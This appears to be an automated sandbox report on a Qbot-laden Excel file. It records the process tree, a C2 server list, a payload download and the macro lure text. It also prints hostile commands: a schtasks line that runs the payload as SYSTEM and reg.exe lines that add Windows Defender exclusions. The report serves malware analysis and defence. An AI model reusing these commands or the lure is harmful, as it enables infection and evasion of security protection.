Windows Analysis Report xls.xls

Overview

General Information

Sample Name: xls.xls
Analysis ID: 492442
MD5: 170b6a83db1f64901d186eda31962306
SHA1: 9dedf1b8c2af2ea202b62b8c8a07a314f56ca6d5
SHA256: 7afc98f96efa95af64e356e7857d7db38e9d2eb9a0b8cab36acc7f8b96b7f978

Detection

Hidden Macro 4.0 Qbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Qbot
Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Office process drops PE file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
PE file has nameless sections
Sigma detected: Regsvr32 Command Line Without DLL
Machine Learning detection for dropped file
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Uses reg.exe to modify the Windows registry
Document contains embedded VBA macros
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 508 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 2784 cmdline: regsvr32 -silent ..\Drezd.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1176 cmdline: -silent ..\Drezd.red MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 1016 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
          • schtasks.exe (PID: 2556 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mywmprn /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:03 /ET 18:15 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • regsvr32.exe (PID: 1832 cmdline: regsvr32 -silent ..\Drezd1.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2520 cmdline: regsvr32 -silent ..\Drezd2.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • regsvr32.exe (PID: 3020 cmdline: regsvr32.exe -s 'C:\Users\user\Drezd.red' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2936 cmdline: -s 'C:\Users\user\Drezd.red' MD5: 432BE6CF7311062633459EEF6B242FB5)
      • explorer.exe (PID: 3016 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
        • reg.exe (PID: 840 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Ofsugluhreiu' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
        • reg.exe (PID: 2068 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Csbfke' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
  • regsvr32.exe (PID: 916 cmdline: regsvr32.exe -s 'C:\Users\user\Drezd.red' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2652 cmdline: -s 'C:\Users\user\Drezd.red' MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup

Malware Configuration

Threatname: Qbot

{"Bot id": "obama104", "Campaign": "1632729661", "Version": "402.343", "C2 list": ["95.77.223.148:443", "47.22.148.6:443", "89.101.97.139:443", "27.223.92.142:995", "120.151.47.189:443", "136.232.34.70:443", "120.150.218.241:995", "185.250.148.74:443", "181.118.183.94:443", "140.82.49.12:443", "67.165.206.193:993", "103.148.120.144:443", "71.74.12.34:443", "76.25.142.196:443", "73.151.236.31:443", "173.21.10.71:2222", "75.188.35.168:443", "2.178.88.145:61202", "71.80.168.245:443", "45.46.53.140:2222", "109.12.111.14:443", "105.198.236.99:443", "73.77.87.137:443", "41.248.239.221:995", "182.176.112.182:443", "96.37.113.36:993", "75.66.88.33:443", "162.244.227.34:443", "24.229.150.54:995", "216.201.162.158:443", "92.59.35.196:2222", "196.218.227.241:995", "24.139.72.117:443", "68.207.102.78:443", "72.252.201.69:443", "2.188.27.77:443", "177.130.82.197:2222", "68.204.7.158:443", "189.210.115.207:443", "181.163.96.53:443", "24.55.112.61:443", "75.107.26.196:465", "185.250.148.74:2222", "68.186.192.69:443", "24.152.219.253:995", "50.29.166.232:995"]}

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
xls.xls | JoeSecurity_HiddenMacro | Yara detected hidden Macro 4.0 in Excel | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
0000000D.00000002.635284743.0000000000300000.00000004.00000001.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
00000006.00000002.619249193.00000000003B0000.00000004.00000001.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
7.2.explorer.exe.80000.0.raw.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
6.2.regsvr32.exe.3b0000.1.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
14.2.explorer.exe.c0000.0.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
6.2.regsvr32.exe.3b0000.1.raw.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
7.2.explorer.exe.80000.0.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: regsvr32 -silent ..\Drezd.red, CommandLine: regsvr32 -silent ..\Drezd.red, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 508, ProcessCommandLine: regsvr32 -silent ..\Drezd.red, ProcessId: 2784
Sigma detected: Regsvr32 Command Line Without DLL
Source: Process started; Author: Florian Roth; Data: Command: -silent ..\Drezd.red, CommandLine: -silent ..\Drezd.red, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -silent ..\Drezd.red, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 2784, ProcessCommandLine: -silent ..\Drezd.red, ProcessId: 1176

Persistence and Installation Behavior:

Sigma detected: Schedule system process
Source: Process started; Author: Joe Security; Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mywmprn /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:03 /ET 18:15, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mywmprn /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:03 /ET 18:15, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 1016, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mywmprn /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:03 /ET 18:15, ProcessId: 2556

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 14.2.explorer.exe.c0000.0.unpack; Malware Configuration Extractor: Qbot (same configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: xls.xls; Virustotal: Detection: 30%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.7495993056[1].dat; Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: amstream.pdb source: explorer.exe, 00000007.00000003.622662373.0000000002781000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 6_2_1000AEB4 FindFirstFileW,FindNextFileW
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 7_2_0008AEB4 FindFirstFileW,FindNextFileW
Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 13_2_1000AEB4 FindFirstFileW,FindNextFileW
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 14_2_000CAEB4 FindFirstFileW,FindNextFileW

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: 44467.7495993056[1].dat.0.dr
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\regsvr32.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 190.14.37.178:80
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 28 Sep 2021 16:00:02 GMT
  Content-Type: application/octet-stream
  Content-Length: 387072
  Connection: keep-alive
  X-Powered-By: PHP/5.4.16
  Accept-Ranges: bytes
  Expires: 0
  Cache-Control: no-cache, no-store, must-revalidate
  Content-Disposition: attachment; filename="44467.7495993056.dat"
Source: global traffic; HTTP traffic detected:
  GET /44467.7495993056.dat HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 190.14.37.178
  Connection: Keep-Alive
Source: unknown; TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: explorer.exe, 00000007.00000002.888614780.0000000002030000.00000002.00020000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000005.00000002.623444753.0000000001DE0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.619701962.0000000001D20000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.624053267.0000000001C80000.00000002.00020000.sdmp, regsvr32.exe, 0000000A.00000002.624752810.0000000001D10000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.638759143.00000000009E0000.00000002.00020000.sdmp; String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000006.00000002.620761307.0000000002220000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.888614780.0000000002030000.00000002.00020000.sdmp; String found in binary or memory: http://www.%s.comPA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.7495993056[1].dat

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4; Screenshot OCR: Enable editing" in the yellow bar 19 above. 20 example of notification 22 ( 0 pRoTEcTmwARNNG This
Source: Screenshot number: 4; Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the 26 docume
Source: Screenshot number: 4; Screenshot OCR: Enable Macros ) 30 31 32 :: Why I can not open this document? 35 36 - You are using iOS or And
Source: Document image extraction number: 0; Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 PROTECTEDWARNING This file o
Source: Document image extraction number: 0; Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Document image extraction number: 0; Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Source: Document image extraction number: 1; Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 pRoTEcTmwARNNG Thisfileorigi
Source: Document image extraction number: 1; Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Document image extraction number: 1; Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\Drezd.red
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.7495993056[1].dat
PE file has nameless sections
Source: 44467.7495993056[1].dat.0.dr; Static PE information: section name:
Source: 44467.7495993056[1].dat.0.dr; Static PE information: section name:
Source: 44467.7495993056[1].dat.0.dr; Static PE information: section name:
Source: Drezd.red.0.dr; Static PE information: section name:
Source: Drezd.red.0.dr; Static PE information: section name:
Source: Drezd.red.0.dr; Static PE information: section name:
Source: Drezd.red.7.dr; Static PE information: section name:
Source: Drezd.red.7.dr; Static PE information: section name:
Source: Drezd.red.7.dr; Static PE information: section name:
Source: Drezd.red.14.dr; Static PE information: section name:
Source: Drezd.red.14.dr; Static PE information: section name:
Source: Drezd.red.14.dr; Static PE information: section name:
                        Source: xls.xls OLE, VBA macro line: Sub auto_open()
                        Source: xls.xls OLE, VBA macro line: Sub auto_close()
                        Source: xls.xls OLE, VBA macro line: Private m_openAlreadyRan As Boolean
                        Source: xls.xls OLE, VBA macro line: Private Sub saWorkbook_Opensa()
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary
                        Source: Drezd.red.14.dr Static PE information: No import functions for PE file found
                        Source: Drezd.red.7.dr Static PE information: No import functions for PE file found
                        Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Ofsugluhreiu' /d '0'
                        Source: xls.xls OLE indicator, VBA macros: true
                        Source: Joe Sandbox View Dropped File: C:\Users\user\Drezd.red 17D261EACA2629EF9907D0C00FB2271201E466796F06DCB7232900D711C29330
                        Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write
                        Source: xls.xls Virustotal: Detection: 30%
                        Source: C:\Windows\System32\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: C:\Windows\System32\reg.exe Console Write: The operation completed successfully.
                        Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red
                        Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
                        Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red
                        Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mywmprn /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:03 /ET 18:15
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red
                        Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Ofsugluhreiu' /d '0'
                        Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Csbfke' /d '0'
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Application Data\Microsoft\Forms
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVREB76.tmp
                        Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@25/6@0/3
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_1000D523 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_100030B7 StartServiceCtrlDispatcherA
                        Source: xls.xls OLE indicator, Workbook stream: true
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_1000ABA3 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle
                        Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{E2FE3E6D-C1F8-4CA3-893D-519B96E24CEA}
                        Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\{5AAEC833-6C77-49D4-9B40-99D59FAADF51}
                        Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{E2FE3E6D-C1F8-4CA3-893D-519B96E24CEA}
                        Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\{85FB811B-425C-42D1-AD62-706F36D732CD}
                        Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{5AAEC833-6C77-49D4-9B40-99D59FAADF51}
                        Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\Global\{85FB811B-425C-42D1-AD62-706F36D732CD}
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Window found: window name: SysTabControl32
                        Source: Window Recorder Window detected: More than 3 window changes detected
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                        Source: Binary string: amstream.pdb source: explorer.exe, 00000007.00000003.622662373.0000000002781000.00000004.00000001.sdmp
                        Source: 44467.7495993056[1].dat.0.dr Static PE information: section name: .rdatat
                        Source: 44467.7495993056[1].dat.0.dr Static PE information: section name:
                        Source: 44467.7495993056[1].dat.0.dr Static PE information: section name:
                        Source: 44467.7495993056[1].dat.0.dr Static PE information: section name:
                        Source: Drezd.red.0.dr Static PE information: section name: .rdatat
                        Source: Drezd.red.0.dr Static PE information: section name:
                        Source: Drezd.red.0.dr Static PE information: section name:
                        Source: Drezd.red.0.dr Static PE information: section name:
                        Source: Drezd.red.7.dr Static PE information: section name: .rdatat
                        Source: Drezd.red.7.dr Static PE information: section name:
                        Source: Drezd.red.7.dr Static PE information: section name:
                        Source: Drezd.red.7.dr Static PE information: section name:
                        Source: Drezd.red.14.dr Static PE information: section name: .rdatat
                        Source: Drezd.red.14.dr Static PE information: section name:
                        Source: Drezd.red.14.dr Static PE information: section name:
                        Source: Drezd.red.14.dr Static PE information: section name:
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_1000DFAD LoadLibraryA,GetProcAddress

                        Persistence and Installation Behavior:

                        Uses cmd line tools excessively to alter registry or file data
                        Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Drezd.red
                        Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.7495993056[1].dat

                        Boot Survival:

                        Drops PE files to the user root directory
                        Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red
                        Uses schtasks.exe or at.exe to add and modify task schedules
                        Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mywmprn /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:03 /ET 18:15
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_100030B7 StartServiceCtrlDispatcherA

                        Hooking and other Techniques for Hiding and Protection:

                        Overwrites code with unconditional jumps - possibly settings hooks in foreign process
                        Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 1016 base: 44102D value: E9 BA 4C C4 FF
                        Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 3016 base: 44102D value: E9 BA 4C C8 FF
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1160 Thread sleep count: 42 > 30
                        Source: C:\Windows\SysWOW64\explorer.exe TID: 1592 Thread sleep time: -104000s >= -30000s
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2420 Thread sleep count: 44 > 30
                        Source: C:\Windows\SysWOW64\explorer.exe TID: 1904 Thread sleep count: 79 > 30
                        Source: C:\Windows\SysWOW64\explorer.exe TID: 1904 Thread sleep time: -88000s >= -30000s
                        Source: C:\Windows\SysWOW64\explorer.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                        Source: C:\Windows\SysWOW64\regsvr32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_6-12816
                        Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.7495993056[1].dat
                        Source: C:\Windows\SysWOW64\regsvr32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_6-11431
                        Source: C:\Windows\SysWOW64\explorer.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
                        Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_1000AEB4 FindFirstFileW,FindNextFileW
                        Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_0008AEB4 FindFirstFileW,FindNextFileW
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_1000AEB4 FindFirstFileW,FindNextFileW
                        Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_000CAEB4 FindFirstFileW,FindNextFileW
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_10005F82 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_1000DFAD LoadLibraryA,GetProcAddress
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_00194495 or ebx, dword ptr fs:[00000030h]
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_001A4495 or ebx, dword ptr fs:[00000030h]
                        Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_00085A61 RtlAddVectoredExceptionHandler
                        Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_000C5A61 RtlAddVectoredExceptionHandler

                        HIPS / PFW / Operating System Protection Evasion:

                        Maps a DLL or memory area into another process
                        Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
                        Writes to foreign memory regions
                        Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000
                        Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 44102D
                        Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: F0000
                        Allocates memory in foreign processes
                        Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
